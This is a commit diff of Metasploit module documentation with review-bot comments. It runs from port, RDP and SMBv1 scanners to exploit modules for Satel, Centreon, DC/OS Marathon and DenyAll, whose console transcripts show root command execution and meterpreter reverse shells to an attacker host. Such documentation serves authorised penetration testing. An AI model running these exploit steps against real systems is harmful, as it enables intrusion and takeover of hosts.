2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such.
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.45.159
RHOSTS => 192.168.45.159
msf auxiliary(syn) > set PORTS 1-10000
PORTS => 1-10000
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.45.159:22
[*] TCP OPEN 192.168.45.159:23
[*] TCP OPEN 192.168.45.159:111
[*] TCP OPEN 192.168.45.159:445
[*] TCP OPEN 192.168.45.159:512
[*] TCP OPEN 192.168.45.159:513
[*] TCP OPEN 192.168.45.159:1099
[*] TCP OPEN 192.168.45.159:2121
[*] TCP OPEN 192.168.45.159:3306
[*] TCP OPEN 192.168.45.159:3632
[*] TCP OPEN 192.168.45.159:6000
[*] TCP OPEN 192.168.45.159:6697
[*] TCP OPEN 192.168.45.159:8009
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
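Review bot: the Description omits that a SYN scan is built on raw sockets and therefore needs root (or equivalent) on the scanning host; the xmas document added in this commit carries a "Required Permissions" section saying exactly that, and the tcp document contrasts itself with "This does not need administrative privileges on the source machine", so the syn document should carry the same section. The second and third sentences of the Description also need tightening: "It is this done by" should be "This is done by"; it is the scanner that answers the SYN/ACK with a RST so the handshake never completes (the target does not "assume there is a communication error", the half-open connection is simply torn down); and the stealth benefit is that the listening application never receives a completed connection, so application-level logs show nothing, rather than "most logging applications do not log the TCP/RST". "Default options is to scan `1-10000` ports" should be "The default is to scan ports `1-10000`", and "Metaspliotable 2" should be "Metasploitable 2" (also in the tcp and xmas documents).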

@ -0,0 +1,71 @@
## Description
This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
## Vulnerable Application
Any reachable TCP endpoint is a potential target.
## Options
**PORTS**
This is the list of ports to test for TCP Scan on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**ConnectTimeout**
This options states the maximum number of seconds to establish a tcp
connection. Default value if `10`.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: ```use auxiliary/scanner/portscan/tcp```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set PORTS [PORTS]```
4. Do: ```run```
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.45.159
msf auxiliary(tcp) > set PORTS 1-10000
msf auxiliary(tcp) > run
[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3632 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
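Review bot: the ConnectTimeout paragraph has two typos that change the meaning: "This options states" should be "This option states" and "Default value if `10`" should be "Default value is `10`" (the same "Default value if" appears in the xmas document). "Default options is to scan `1-10000` ports" should be "The default is to scan ports `1-10000`", and "Metaspliotable 2" should be "Metasploitable 2". The Scenarios block itself is useful as the reference result for this host, since it lists the ports Metasploitable 2 actually has open (21, 22, 23, 25, 53, 80, 111, 139, 445, ...), which the syn and xmas outputs against the same 192.168.45.159 can be checked against.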

@ -0,0 +1,91 @@
# Description
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
#### OPEN|FILTERED Port:
Detects open|filtered port via no response to the segment
#### Closed Port:
Detects a closed port via a RST received in response to the FIN
# Required Permissions
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
# Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**Timeout**
This options states the reply read timeout in milliseconds. Default value if `500`.
**RHOSTS**
The target address range is defined in this option.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were not open/filtered.
# Verification Steps
1. Do: `use auxiliary/scanner/portscan/xmas`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. The open/filtered ports will be discovered, status will be printed indicating as such.
# Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.45.159
rhosts => 192.168.45.159
msf auxiliary(xmas) > set ports 1-100
ports => 1-100
msf auxiliary(xmas) > run
[*] TCP OPEN|FILTERED 192.168.45.159:1
[*] TCP OPEN|FILTERED 192.168.45.159:3
[*] TCP OPEN|FILTERED 192.168.45.159:5
[*] TCP OPEN|FILTERED 192.168.45.159:8
[*] TCP OPEN|FILTERED 192.168.45.159:12
[*] TCP OPEN|FILTERED 192.168.45.159:14
[*] TCP OPEN|FILTERED 192.168.45.159:16
[*] TCP OPEN|FILTERED 192.168.45.159:19
[*] TCP OPEN|FILTERED 192.168.45.159:21
[*] TCP OPEN|FILTERED 192.168.45.159:37
[*] TCP OPEN|FILTERED 192.168.45.159:39
[*] TCP OPEN|FILTERED 192.168.45.159:41
[*] TCP OPEN|FILTERED 192.168.45.159:43
[*] TCP OPEN|FILTERED 192.168.45.159:49
[*] TCP OPEN|FILTERED 192.168.45.159:52
[*] TCP OPEN|FILTERED 192.168.45.159:53
[*] TCP OPEN|FILTERED 192.168.45.159:55
[*] TCP OPEN|FILTERED 192.168.45.159:57
[*] TCP OPEN|FILTERED 192.168.45.159:59
[*] TCP OPEN|FILTERED 192.168.45.159:61
[*] TCP OPEN|FILTERED 192.168.45.159:63
[*] TCP OPEN|FILTERED 192.168.45.159:65
[*] TCP OPEN|FILTERED 192.168.45.159:67
[*] TCP OPEN|FILTERED 192.168.45.159:69
[*] TCP OPEN|FILTERED 192.168.45.159:73
[*] TCP OPEN|FILTERED 192.168.45.159:89
[*] TCP OPEN|FILTERED 192.168.45.159:91
[*] TCP OPEN|FILTERED 192.168.45.159:93
[*] TCP OPEN|FILTERED 192.168.45.159:95
[*] TCP OPEN|FILTERED 192.168.45.159:97
[*] TCP OPEN|FILTERED 192.168.45.159:99
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
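Review bot: the Scenarios output does not agree with the tcp document's scan of the same host 192.168.45.159 in this commit: ports 22, 23, 25 and 80, which the tcp scan reports open, are absent here (the module only omits a port when a RST came back), while ports 1, 3, 5, 8 and 12, which the tcp scan does not list, are reported OPEN|FILTERED. That pattern points at the 500 ms Timeout dropping replies, or a target that rate-limits RSTs, rather than at real results; either re-run with a larger Timeout and fewer threads, or explain in the text that OPEN|FILTERED is ambiguous and that a lossy path turns closed ports into false positives. Smaller points: the first sentence says the module determines whether ports are "closed", while the rest of the file describes it as separating open|filtered from closed; the headings use a single `#` where the other module documents in this commit use `##`; "This options states the reply read timeout ... Default value if `500`" should be "This option states ... Default value is `500`"; "Metaspliotable 2" should be "Metasploitable 2".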

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```
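Review bot: step 2, `set [RHOSTS]`, has the same problem as in the cisco_smart_install document: it omits the option name and should be `set RHOSTS [RHOSTS]`. The Options section describes TLS, CredSSP and EarlyUser but gives neither their defaults nor the values used for the Scenarios run, so the output cannot be reproduced from the text; add the defaults (a `show options` listing would do) and say that a locked-down endpoint may only answer when a particular protocol set is requested, which is the reason the text gives for the options existing.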

@ -0,0 +1,55 @@
# Description
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
```PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
```
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
If the SMB server does not support SMBv1 a RST will be sent.
___
# Usage
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
#### A host that does support SMBv1.
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(smb1) > run
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb1) > services -S x.x.x.x
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
x.x.x.x 445 tcp smb1 open
```
#### A host that does not support SMBv1
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS y.y.y.y
RHOSTS => y.y.y.y
msf auxiliary(smb1) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
___
## Options
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.
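Review bot: "SMB_COM_NEGOTATE" in the Description should be "SMB_COM_NEGOTIATE", and the dialect list opens its fence on the same line as the first dialect ("```PC NETWORK PROGRAM 1.0"), which renders the first entry inline with the fence; put the opening fence on its own line. Structure: this file uses `# Description`, `# Usage`, `#### ...`, `## Options` and `___` rules where every other module document in this commit uses `## Description` / `## Verification Steps` / `## Scenarios`; align to that layout. Stating that a server lacking SMBv1 "will send a RST" is the only behaviour the text covers, but the y.y.y.y run shows only silence, so say what the module reports when the server answers with something other than a dialect selection or a RST (for example a clean close or an error response). Minor: in both transcripts the prompt already reads `msf auxiliary(smb1) >` before the `use` command is issued.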

@ -1,6 +1,8 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows: Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
3. Do: ```set RPORT [PORT]``` 3. Do: ```set RPORT [PORT]```
4. Do: ```run``` 4. Do: ```run```
## Sample Output ## Scenarios
``` ```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot msf > use auxiliary/scanner/snmp/epmp_snmp_loot

@ -14,7 +14,7 @@
5. Do: `run` 5. Do: `run`
6. You will hopefully see something similar to, followed by a session: 6. You will hopefully see something similar to, followed by a session:
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '``` ```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
## Options ## Options

@ -0,0 +1,28 @@
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
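Review bot: this new file still uses `## Sample Output` while the rest of this commit renames that heading to `## Scenarios` in every existing module document (meteocontrol, ms15_034, owa_ews_login, robots_txt, cisco_ike_benigncertain, epmp_snmp_loot), so it should use `## Scenarios` as well. It also lacks the `## Vulnerable Application` heading the other new documents carry; the affected-version list at the top belongs under it. The numbered version list ends its items with "and prior," / "and prior, and", which reads as one run-on sentence; drop the trailing punctuation and conjunction. "SenNet Data Logger and Electricity Meters, monitoring platforms, are affected" should read "SenNet Data Logger and Electricity Meters (monitoring platforms) are affected".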

@ -187,7 +187,7 @@ finish
## Scenarios ## Scenarios
Just a standard run. Just a standard run.
```
msf > use exploit/linux/http/centreon_useralias_exec msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python payload => cmd/unix/reverse_python

@ -0,0 +1,192 @@
# Vulnerable Application
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS
## DCOS
This Exploit was tested with CentOS 7 as the host operating system for
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
Default 'custom' installation for on site premise setup. Only the Install
part of the DCOS guide was completed, the system hardening and securing
your cluster section where skipped. This is to represent a 'Default' install
with a system admin conducting hasty deployments taking no thought about security.
## To Setup Your Cluster
I recommend doing a 'on-premise'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
sudo groupadd nogroup && sudo reboot
```
Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
--add-repo \
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot
```
Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastly generate ssh rsa keys for authentication. And update the
/etc/ssh/sshd_config file to support root login.
```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```
Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
Login and get their current IP address.
* Note: I recommend giving them static IPs if you have further use for the cluster.
From here use another Linux machine with docker installed to finish
the installation process. I used an Ubuntu machine with docker installed.
Follow the custom CLI guide for creating the required files in
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/
Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`
Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://[master_ip]:8080/
You should see the Marathon UI web application.
# Exploitation
This module is designed for the attacker to leverage, creation of a
docker container with out authentication through the DCOS Marathon UI
to gain root access to the hosting server of the docker container
in the DCOS cluster.
## Options
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```
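Review bot: in the second bash block, `sudo echo overlay > /etc/modules-load.d/overlay.conf` does not do what the guide intends: only `echo` runs as root while the redirection is performed by the unprivileged shell, so the write into /etc/modules-load.d fails with "Permission denied"; use `echo overlay | sudo tee /etc/modules-load.d/overlay.conf`. In the ssh block, `rm ~/.ssh/id_rsa` deletes the only copy of the private key that the installer later needs as `genconf/ssh_key`; the comment warns about it, but copying the key into genconf first and dropping the `rm` step would be safer. The ip-detect script hard-codes the interface name `ens33`, which will differ on other hypervisors or NIC layouts; say it must match the interface on the master and agent. Typos: "owed by root" (owned), "Further more" (Furthermore), "where skipped" (were skipped), "base on" (based on), "with out" (without), "coffie" (coffee). Headings mix levels (`# Vulnerable Application`, `## DCOS`, `# Exploitation`, `## Options`); pick one scheme, preferably the `##` layout the other module documents use.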

@ -0,0 +1,47 @@
## Vulnerable Application
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
You just need to follow instruction above URL.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```
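Review bot: step 2 of the Verification Steps reads `use use exploit/linux/http/denyall_exec` (doubled `use`). The Scenarios transcript is also internally inconsistent: the handler is started on `35.12.3.3:4444`, but the session line reads `(35.176.123.128:4444 -> 35.12.3.3:60556)`, i.e. handler and target addresses are swapped; a real reverse TCP session line for this run would show `35.12.3.3:4444 -> 35.176.123.128:<port>`, so this output looks hand-edited and should be replaced by a genuine run. The Vulnerable Application section names no affected version or fixed release for the command injection; add them, or the advisory reference the module cites. "Trigerring" should be "Triggering", and "It's possible to have trial demo for 15 days at Amazon Marketplace" should read "A 15-day trial is available on the AWS Marketplace".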
